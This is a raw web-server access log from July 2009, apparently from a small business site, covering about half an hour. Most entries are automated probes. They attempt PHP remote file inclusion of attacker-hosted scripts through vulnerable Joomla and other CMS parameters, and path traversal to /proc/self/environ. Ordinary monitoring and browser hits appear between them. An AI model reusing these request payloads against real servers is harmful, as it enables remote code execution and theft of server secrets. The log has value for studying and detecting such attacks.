87.242.98.70 - - [20/Jul/2009:00:30:12 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:00:30:12 -0400] "GET /logs/access_log.Q109070700/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:00:30:12 -0400] "GET /logs/access_log.Q109062200/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:00:30:48 -0400] "GET /logs/access_log.Q109070700%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:00:30:48 -0400] "GET /logs/access_log.Q109062200%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:00:30:59 -0400] "GET /logs/access_log.Q109070700%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:00:30:59 -0400] "GET /logs/access_log.Q109062200%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jul/2009:00:32:13 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt????? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jul/2009:00:32:13 -0400] "GET /logs/access_log.Q109051200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jul/2009:00:32:13 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:32:17 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:32:17 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jul/2009:00:32:17 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt????? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jul/2009:00:32:17 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt????? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jul/2009:00:32:17 -0400] "GET /logs/access_log.Q109051200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jul/2009:00:32:24 -0400] "GET /logs/access_log.Q109051000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jul/2009:00:32:26 -0400] "GET /logs/access_log.Q109051000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt????? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:33:11 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:33:56 -0400] "GET /logs/access_log.Q109070600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:34:28 -0400] "GET /logs/error_log.Q109070600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:00:35:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.149.163.198 - - [20/Jul/2009:00:35:09 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
62.149.163.198 - - [20/Jul/2009:00:35:09 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
62.149.163.198 - - [20/Jul/2009:00:35:09 -0400] "GET /logs/access_log.Q109051000//oneadmin/photogallery/include.php?path[docroot]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
62.149.163.198 - - [20/Jul/2009:00:35:09 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
62.149.163.198 - - [20/Jul/2009:00:35:09 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
62.149.163.198 - - [20/Jul/2009:00:35:09 -0400] "GET /logs/access_log.Q109051000/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
62.149.163.198 - - [20/Jul/2009:00:35:09 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 232 "-" "XXXXXX"
62.149.163.198 - - [20/Jul/2009:00:35:09 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 237 "-" "XXXXXX"
62.149.163.198 - - [20/Jul/2009:00:35:09 -0400] "GET /logs/access_log.Q109051000//oneadmin/photogallery/include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 259 "-" "XXXXXX"
62.149.163.198 - - [20/Jul/2009:00:35:09 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 232 "-" "XXXXXX"
62.149.163.198 - - [20/Jul/2009:00:35:09 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 237 "-" "XXXXXX"
62.149.163.198 - - [20/Jul/2009:00:35:09 -0400] "GET /logs/access_log.Q109051000//oneadmin/photogallery/include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 259 "-" "XXXXXX"
124.0.139.129 - - [20/Jul/2009:00:35:34 -0400] "GET /logs/access_log.Q109070600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
61.100.5.136 - - [20/Jul/2009:00:35:41 -0400] "GET //bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
61.100.5.136 - - [20/Jul/2009:00:35:41 -0400] "GET /logs//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
61.100.5.136 - - [20/Jul/2009:00:35:42 -0400] "GET /logs/access_log.Q109071500//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 307 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:36:13 -0400] "GET /logs/error_log.Q109070600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:36:33 -0400] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:36:33 -0400] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
219.117.207.76 - - [20/Jul/2009:00:36:34 -0400] "GET //bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://piffopuff.se/images/stories/test.txt??? HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
219.117.207.76 - - [20/Jul/2009:00:36:34 -0400] "GET /logs//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://piffopuff.se/images/stories/test.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
61.100.5.136 - - [20/Jul/2009:00:36:36 -0400] "GET /logs/access_log.Q109071200//bbs/skin/ggambo7002_board/comment_modify.php//bbs/skin/ggambo7002_board/write.php?dir=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 307 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:37:16 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jul/2009:00:37:30 -0400] "GET /logs/access_log.Q109051200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt????? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jul/2009:00:38:04 -0400] "GET /logs/access_log.Q109051000%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt????? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jul/2009:00:38:12 -0400] "GET /logs/access_log.Q109051200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt????? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.153.28.140 - - [20/Jul/2009:00:38:12 -0400] "GET /logs/access_log.Q109051000%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt????? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:38:33 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:38:33 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:38:33 -0400] "GET /logs/access_log.Q109052400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:39:17 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:39:17 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:39:17 -0400] "GET /logs/access_log.Q109052400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:39:19 -0400] "GET /logs/access_log.Q109070200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:39:44 -0400] "GET /logs/access_log.Q109070200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:00:40:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.78.231 - - [20/Jul/2009:00:41:23 -0400] "GET /logs/error_log.Q107093000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
124.0.139.129 - - [20/Jul/2009:00:41:38 -0400] "GET /logs/access_log.Q109052400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:41:46 -0400] "GET /logs/access_log.Q109070200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
110.45.146.193 - - [20/Jul/2009:00:41:58 -0400] "GET /logs/access_log.Q109062500%20%20//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:42:01 -0400] "GET /logs/access_log.Q109052400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:42:02 -0400] "GET /logs/access_log.Q109070200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
110.45.146.193 - - [20/Jul/2009:00:42:18 -0400] "GET /logs/access_log.Q109062800%20%20//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
213.189.27.78 - - [20/Jul/2009:00:42:53 -0400] "GET /logs/access_log.Q109070100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.intense.altervista.org/php6/middle.txt? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
213.189.27.78 - - [20/Jul/2009:00:42:54 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.intense.altervista.org/php6/middle.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
213.189.27.78 - - [20/Jul/2009:00:42:54 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.intense.altervista.org/php6/middle.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
69.64.67.185 - - [20/Jul/2009:00:43:02 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
69.64.67.185 - - [20/Jul/2009:00:43:02 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
69.64.67.185 - - [20/Jul/2009:00:43:02 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
69.64.67.185 - - [20/Jul/2009:00:43:02 -0400] "GET /logs/access_log.Q109061200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
69.64.67.185 - - [20/Jul/2009:00:44:06 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.porn-free.org/SWISH-E/AutoSwish/fx29id1.TXT? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.64.67.185 - - [20/Jul/2009:00:44:06 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.porn-free.org/SWISH-E/AutoSwish/fx29id1.TXT? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.64.67.185 - - [20/Jul/2009:00:44:06 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.porn-free.org/SWISH-E/AutoSwish/fx29id1.TXT? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.64.67.185 - - [20/Jul/2009:00:44:06 -0400] "GET /logs/access_log.Q109061200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.porn-free.org/SWISH-E/AutoSwish/fx29id1.TXT? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:00:44:34 -0400] "GET /logs/access_log.Q109051500//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:00:45:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.64.67.185 - - [20/Jul/2009:00:47:10 -0400] "GET /logs/access_log.Q109062900%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://yoursupplements4you.com/wp-content/themes/diarykey/images/img08.jpg??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
69.64.67.185 - - [20/Jul/2009:00:47:20 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
69.64.67.185 - - [20/Jul/2009:00:47:20 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
69.64.67.185 - - [20/Jul/2009:00:47:20 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
69.64.67.185 - - [20/Jul/2009:00:47:20 -0400] "GET /logs/access_log.Q109061200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
218.30.100.97 - - [20/Jul/2009:00:48:45 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.porn-free.org/SWISH-E/AutoSwish/fx29id1.TXT? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.30.100.97 - - [20/Jul/2009:00:48:45 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.porn-free.org/SWISH-E/AutoSwish/fx29id1.TXT? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.30.100.97 - - [20/Jul/2009:00:48:45 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.porn-free.org/SWISH-E/AutoSwish/fx29id1.TXT? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.30.100.97 - - [20/Jul/2009:00:48:45 -0400] "GET /logs/access_log.Q109061200%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.porn-free.org/SWISH-E/AutoSwish/fx29id1.TXT? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
119.152.71.21 - - [20/Jul/2009:00:49:25 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
119.152.71.21 - - [20/Jul/2009:00:49:26 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
124.0.139.129 - - [20/Jul/2009:00:49:27 -0400] "GET /logs/access_log.Q109051500//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:00:50:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.149.163.198 - - [20/Jul/2009:00:50:59 -0400] "GET /logs/access_log.Q109063000//oneadmin/photogallery/include.php?path[docroot]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
62.149.163.198 - - [20/Jul/2009:00:50:59 -0400] "GET /logs/access_log.Q109063000/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
62.149.163.198 - - [20/Jul/2009:00:51:00 -0400] "GET /logs/access_log.Q109063000//oneadmin/photogallery/include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 259 "-" "XXXXXX"
62.149.163.198 - - [20/Jul/2009:00:51:00 -0400] "GET /logs/access_log.Q109063000//oneadmin/photogallery/include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 259 "-" "XXXXXX"
69.64.67.185 - - [20/Jul/2009:00:51:29 -0400] "GET /logs/access_log.Q109062900%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/Jul/2009:00:55:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.78.231 - - [20/Jul/2009:00:55:47 -0400] "GET /logs/access_log.Q109071100 HTTP/1.0" 200 2250018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.2.194.146 - - [20/Jul/2009:00:56:00 -0400] "GET /logs/access_log.Q109070600//?_zb_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
62.2.194.146 - - [20/Jul/2009:00:56:00 -0400] "GET /logs/access_log.Q109070600/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
62.2.194.146 - - [20/Jul/2009:00:56:00 -0400] "GET /logs/access_log.Q109070600//?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 226 "-" "XXXXXX"
62.2.194.146 - - [20/Jul/2009:00:56:01 -0400] "GET /logs/access_log.Q109070600//?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 226 "-" "XXXXXX"
62.2.194.146 - - [20/Jul/2009:00:56:23 -0400] "GET //?_zb_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
62.2.194.146 - - [20/Jul/2009:00:56:23 -0400] "GET /logs//?_zb_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 200 10267 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
62.2.194.146 - - [20/Jul/2009:00:56:24 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
62.2.194.146 - - [20/Jul/2009:00:56:24 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
62.2.194.146 - - [20/Jul/2009:00:56:24 -0400] "GET //?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 452 "-" "XXXXXX"
62.2.194.146 - - [20/Jul/2009:00:56:24 -0400] "GET /logs//?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 10267 "-" "XXXXXX"
62.2.194.146 - - [20/Jul/2009:00:56:24 -0400] "GET //?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 452 "-" "XXXXXX"
62.2.194.146 - - [20/Jul/2009:00:56:24 -0400] "GET /logs//?_zb_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 10267 "-" "XXXXXX"
218.30.100.97 - - [20/Jul/2009:00:56:31 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.porn-free.org/SWISH-E/AutoSwish/fx29id1.TXT? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.30.100.97 - - [20/Jul/2009:00:56:31 -0400] "GET /logs/access_log.Q109061200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.porn-free.org/SWISH-E/AutoSwish/fx29id1.TXT? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
92.50.143.90 - - [20/Jul/2009:00:57:14 -0400] "GET /logs//encapscms_PATH/core/core.php?root=http://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
92.50.143.90 - - [20/Jul/2009:00:57:14 -0400] "GET //encapscms_PATH/core/core.php?root=http://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.803"
99.56.243.74 - - [20/Jul/2009:00:57:23 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows 6.0; MSIE 8.0.6001.18783)"
99.56.243.74 - - [20/Jul/2009:00:57:24 -0400] "GET /favicon.gif HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.1.1715.1442; Windows 6.0; MSIE 8.0.6001.18783)"
